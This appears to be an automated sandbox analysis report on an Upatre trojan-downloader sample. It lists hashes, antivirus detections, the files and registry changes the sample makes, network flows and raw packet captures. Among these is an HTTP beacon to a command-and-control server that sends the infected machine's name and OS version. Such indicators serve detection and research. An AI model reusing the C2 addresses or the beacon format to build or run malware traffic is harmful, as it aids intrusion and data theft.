Analysis Date2015-10-24 02:55:37
MD537131718090270d6c4bbbd89f1d56839
SHA1c065f71b30e5612faae55802ad707cee51457276

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6587a6a4d6498a190a30a2180473dc5d sha1: 1c4042a06b200d18538f34cef6a77764b7a4fc19 size: 8704
Section.rdata md5: cbbb2d1e523cf82a3e3dcbe0a84f10b1 sha1: 976bf0dd8ceba8108dfaf182c04016d3502a7593 size: 4096
Section.data md5: fb889d4813bc4ffbc538086cb28dd48a sha1: e7e45b6a54834a098298e59219ed1d6db044e25d size: 1024
Section.rsrc md5: 3138a8e73eb076670f21de31236fd9bd sha1: 38ca4913ebd6026f0a950e5e04076abbfc8075f9 size: 20480
Timestamp2014-02-04 19:02:04
PackerMicrosoft Visual C++ v6.0
PEhash473bc989fa837248050401ff7aac1b8565daed34
IMPhash9f9e95f9db59de9e95416835d48a17dc
AVRisingTrojan.Win32.Kryptik.af
AVMcafeeDownloader-FASG!371317180902
AVAvira (antivir)TR/Yarwi.djamna
AVTwisterTrojanDldr.Upatre.jgz.izbz
AVAd-AwareTrojan.Upatre.Gen.3
AVAlwil (avast)Dyre-K [Trj]
AVEset (nod32)Win32/Kryptik.DHFK
AVGrisoft (avg)Generic_s.EPS
AVSymantecDownloader.Upatre!gen5
AVFortinetW32/Kryptik.DIRZ!tr
AVBitDefenderTrojan.Upatre.Gen.3
AVK7Trojan-Downloader ( 004c16281 )
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre!rfn
AVMicroWorld (escan)Trojan.Upatre.Gen.3
AVMalwareBytesTrojan.Upatre
AVAuthentiumW32/Dalexis.H.gen!Eldorado
AVFrisk (f-prot)W32/Dalexis.H.gen!Eldorado
AVIkarusTrojan.Win32.Kadena
AVEmsisoftTrojan.Upatre.Gen.3
AVZillya!Downloader.CTBLocker.Win32.23
AVKasperskyTrojan-Downloader.Win32.Upatre.jgz
AVTrend MicroTROJ_UPATRE.SM05
AVCAT (quickheal)Trojan.Kadena.B4
AVVirusBlokAda (vba32)TrojanDownloader.Upatre
AVPadvishno_virus
AVBullGuardTrojan.Upatre.Gen.3
AVArcabit (arcavir)Trojan.Upatre.Gen.3
AVClamAVno_virus
AVDr. WebTrojan.DownLoader13.9559
AVF-SecureTrojan.Upatre.Gen.3
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\xov1795.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS38.124.61.144
Winsock DNS91.211.17.201
Winsock DNS38.124.74.82
Winsock DNS38.124.75.146
Winsock DNS38.124.74.232
Winsock DNS188.255.134.177
Winsock DNS38.124.60.223
Winsock DNS38.124.75.227
Winsock DNSicanhazip.com

Network Details:

DNSicanhazip.com
Type: A
104.238.141.75
DNSicanhazip.com
Type: A
104.238.136.31
DNSicanhazip.com
Type: A
104.238.145.30
DNSfoodpicsgo.com
Type: A
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
HTTP GEThttp://91.211.17.201:13467/MOUSE12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Flows TCP192.168.1.1:1031 ➝ 104.238.141.75:80
Flows TCP192.168.1.1:1032 ➝ 91.211.17.201:13467
Flows TCP192.168.1.1:1033 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1034 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1035 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1036 ➝ 38.124.60.223:443
Flows TCP192.168.1.1:1037 ➝ 38.124.61.144:443
Flows TCP192.168.1.1:1038 ➝ 38.124.61.144:443
Flows TCP192.168.1.1:1039 ➝ 38.124.61.144:443
Flows TCP192.168.1.1:1040 ➝ 38.124.61.144:443
Flows TCP192.168.1.1:1041 ➝ 38.124.74.232:443
Flows TCP192.168.1.1:1042 ➝ 38.124.74.232:443
Flows TCP192.168.1.1:1043 ➝ 38.124.74.232:443
Flows TCP192.168.1.1:1044 ➝ 38.124.74.232:443
Flows TCP192.168.1.1:1045 ➝ 38.124.74.82:443
Flows TCP192.168.1.1:1046 ➝ 38.124.74.82:443
Flows TCP192.168.1.1:1047 ➝ 38.124.74.82:443
Flows TCP192.168.1.1:1048 ➝ 38.124.74.82:443
Flows TCP192.168.1.1:1049 ➝ 38.124.75.146:443
Flows TCP192.168.1.1:1050 ➝ 38.124.75.146:443
Flows TCP192.168.1.1:1051 ➝ 38.124.75.146:443
Flows TCP192.168.1.1:1052 ➝ 38.124.75.146:443
Flows TCP192.168.1.1:1053 ➝ 38.124.75.227:443
Flows TCP192.168.1.1:1054 ➝ 38.124.75.227:443
Flows TCP192.168.1.1:1055 ➝ 38.124.75.227:443
Flows TCP192.168.1.1:1056 ➝ 38.124.75.227:443
Flows TCP192.168.1.1:1057 ➝ 188.255.134.177:443
Flows TCP192.168.1.1:1058 ➝ 188.255.134.177:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 72763a33 342e3029   NT 6.1; rv:34.0)
0x00000060 (00096)   20476563 6b6f2f32 30313030 31303120    Gecko/20100101 
0x00000070 (00112)   46697265 666f782f 33342e30 0d0a486f   Firefox/34.0..Ho
0x00000080 (00128)   73743a20 6963616e 68617a69 702e636f   st: icanhazip.co
0x00000090 (00144)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000a0 (00160)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f4d4f55 53453132 2f434f4d   GET /MOUSE12/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032)   312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f35 2e302028 57696e64   ozilla/5.0 (Wind
0x00000050 (00080)   6f777320 4e542036 2e313b20 72763a33   ows NT 6.1; rv:3
0x00000060 (00096)   342e3029 20476563 6b6f2f32 30313030   4.0) Gecko/20100
0x00000070 (00112)   31303120 46697265 666f782f 33342e30   101 Firefox/34.0
0x00000080 (00128)   0d0a486f 73743a20 39312e32 31312e31   ..Host: 91.211.1
0x00000090 (00144)   372e3230 313a3133 3436370d 0a436163   7.201:13467..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
a
Cannot assign b to b
CDROM
Invalid Windows Image#Index exceeds data dictionary count/Unsupported non-integer language ID in resource
List capacity out of bounds
List count out of bounds
List index out of bounds
 Module doesn't support streaming
:This  image is invalid because it has missing image parts.
,-!<-.
	)#()#
00aa0OS
#0*<*"; ;8'( 
@@0aq@OE
0@@GEEG
0PPuSh
0qvhv@
0SOuOu0
0v0avGhEEh
3'(	%'0
=31&*0:
!&3:4#;1<&6+$
"$'36$
4(,-+-()&)"
4<'1=:
4"<#5 *
4"ivqa
4OQ[P3
)5!0%#+
$5 6'98
:5  9.
>64;/2
?6 #!?#$9(+
!,')8@*
*81603 
?!/8$-#2
%86?3=&42%"=$5#&
8(7: ;8/!
_acmdln
_adjust_fdiv
aGOSaq
ah@a@qq
AlsClass
aqSGPuOOPGuG
@aSEE@0S@
aSOvOPOE
AvqkOQ
be~2+D
BeginPaint
button
[B_V{L
Cancel
[CDO~W
_controlfp
^C_P{T
\C_P{Z
CreateWindowExA
CvqkOQ
@.data
DefWindowProcA
DispatchMessageA
E0GuqPquP
E0Pauh
EaEvOSa
EEuGEhh
E@GGGSquSuO
EGqqhG
EGSGOuS
EndPaint
EPhhaa
evqkOQ
EvqkOQ
_except_handler3
fflush
G0@aqO@h0SS@@
G@AO~U
GaPquh
GCFO~V
GDCROM
GDDPaP
GDETaP
GDI32.dll
GD@UaP
GEq@vq
GetClientRect
GetCurrentDirectoryA
GetLastError
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
GetWindowTextA
GGCUaT
GGDRaS
GGFVOM
GGGUOM
GGIWaS
GhO0huO@P
GP@OuSG
gvqkOQ
GvqkOQ
@GvuSOvh0E
@hh@qS@PO@S0PqG
hP@OEGG
hq@Ehq0
huSvuGh
iDEO~W
iEIO~P
"ifqaL
iGFWaQ
iGIYaP
_initterm
IvqkOQ
KERNEL32.dll
KvqkOQ
listbox
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadStringA
memcpy
memset
MSVCRT.dll
MvqkOQ
O@GqGuG0
OPuOaa
OSSvGS
OSu0OS
OvEv@v
Ov@PPh
OvqkOQ
OvSEEv
OvSEqS
&#"$~P
PaqEvSPPu@
__p__commode
@PEOEP
__p__fmode
@PG0Ou
@PhaPEE
Pj<PWSh
PostQuitMessage
PPSSqauaSvSS0
P@uOPh
q0OhOvh
Q[9&!1
&qaO3d<r
qEaSh@
qGG@q0
QN_SzW
qv0@uh
qvqkOQ
QXCTzL
QX@S{L
`.rdata
RegisterClassExA
riched32.dll
richedit
Rich)t1
S00OEaEq@O
SendMessageA
__set_app_type
SetFocus
SetLastError
__setusermatherr
ShowWindow
SingleWindow
static
STATIC
SuaaOEa
svqkOQ
S@vuOG
TextOutA
!This program cannot be run in DOS mode.
TranslateAcceleratorA
TranslateMessage
uaS@@@vv
UpdateWindow
uPhvqhOS@
USER32.dll
uvqkOQ
@va0hG
@vE0hq
@vEuqO0
vG0aE00OS
vOuhvE
{vqkOQ
}vqkOQ
vSOSOO
vu@ESPOa
vuuGavhh@0
vvaESE
wcslen
wcsncmp
wvqkOQ
XACO}R
_XcptFilter
\XCSxb
XDEOyS
]XFUaZ
XG_PxL
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security>    <requestedPrivileges>     <requestedExecutionLevel  level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>
XNIO}W
\X@U}L
<#xvqa
XXCU}b
XXIXOM
YGAQ~R
yvqkOQ
YvqkOQ
ZB_PxU
ZN_P}V